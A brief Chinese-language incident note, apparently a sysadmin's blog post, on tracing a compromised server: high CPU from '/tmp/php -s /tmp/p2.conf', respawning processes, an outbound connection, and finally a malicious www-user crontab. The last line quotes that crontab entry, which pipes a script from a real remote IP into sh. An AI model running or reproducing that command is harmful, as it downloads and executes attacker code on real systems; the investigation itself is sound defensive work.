昨天發現 一台服務器突然慢了 top 顯示 幾個進程100%以上的cpu使用
執行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先干掉這幾個進程,但是幾分鍾之后又出現了
先看看這個木馬想干什么吧
netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接
但是tcpdump了一小會兒 沒有發現任何數據傳遞
這他是想干啥?
繼續查看日志吧
在cron日志中發現了www用戶 有一個crontab定時操作 基本就是這個問題了
ls /var/spool/cron/crontabs/www
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1